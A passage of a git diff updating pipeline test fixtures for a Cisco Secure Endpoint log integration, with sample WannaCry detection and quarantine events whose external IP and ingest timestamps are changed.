+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No 
newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 1eb4eaf974b..7fa4df7018a 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json @@ -34,7 +34,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -51,8 +51,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798648568Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:47.010643900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -74,7 +74,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -119,7 +119,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -129,8 +129,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798654363Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010647500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -150,7 +150,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -195,7 +195,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -205,8 +205,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798656876Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010651300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -226,7 +226,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -276,7 +276,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -293,8 +293,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798659144Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010654600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -316,7 +316,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -375,7 +375,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -392,8 +392,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798661450Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:47.010659500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -415,7 +415,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -478,7 +478,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -495,8 +495,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798663701Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:47.010664700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -518,7 +518,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -563,7 +563,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -573,8 +573,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798665972Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat 